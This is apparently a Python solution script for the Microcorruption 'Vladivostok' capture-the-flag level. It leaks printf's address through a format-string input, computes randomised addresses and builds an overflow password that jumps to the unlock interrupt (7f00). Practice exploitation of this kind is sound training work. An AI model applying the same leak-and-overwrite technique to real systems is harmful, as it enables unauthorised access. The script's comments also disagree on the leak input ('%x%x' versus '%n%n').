50 lines
1.5 KiB
Python
50 lines
1.5 KiB
Python
"""
|
|
Script to solve https://microcorruption.com/debugger/Vladivostok
|
|
|
|
- Enter '%x%x' into the username field to get the printf-location
|
|
- Input the printf-location into this script
|
|
- Enter the output string into the password field to solve
|
|
|
|
"""
|
|
|
|
|
|
def reverse_byte_order(hex_int):
|
|
hex_str = hex(hex_int)
|
|
|
|
# Ensure the hex string has an even number of characters
|
|
if len(hex_str) % 2 != 0:
|
|
hex_str = "0" + hex_str
|
|
|
|
# Reverse the byte order in groups of two
|
|
byte_reversed = "".join(reversed([hex_str[i:i + 2] for i in range(0, len(hex_str), 2)]))
|
|
return byte_reversed[:-2]
|
|
|
|
|
|
def get_printf_address():
|
|
hex_str = input("Enter a hex string: ")
|
|
num = int(hex_str, 16)
|
|
return num
|
|
|
|
|
|
def compute_solution():
|
|
# These are the addresses for the program at its original location.
|
|
PRINTF_ADDR = 0x476a # This is the address we can extract via '%n%n'
|
|
INT_ADDR = 0x48ec # This is the address where we can push a specific value to R14
|
|
PUSH_R14_ADDR = 0x4954 # This location triggers an interrupt with R14 as the INT selector
|
|
|
|
|
|
random_printf_addr = get_printf_address()
|
|
random_int_addr = random_printf_addr + (INT_ADDR - PRINTF_ADDR)
|
|
random_push_r14_addr = random_printf_addr + (PUSH_R14_ADDR - PRINTF_ADDR)
|
|
|
|
solution_string = "aaaaaaaaaaaaaaaa" # Initial offset
|
|
solution_string += reverse_byte_order(random_int_addr)
|
|
solution_string += reverse_byte_order(random_push_r14_addr)
|
|
solution_string += "7f00"
|
|
print(solution_string)
|
|
|
|
|
|
if __name__ == "__main__":
|
|
compute_solution()
|
|
|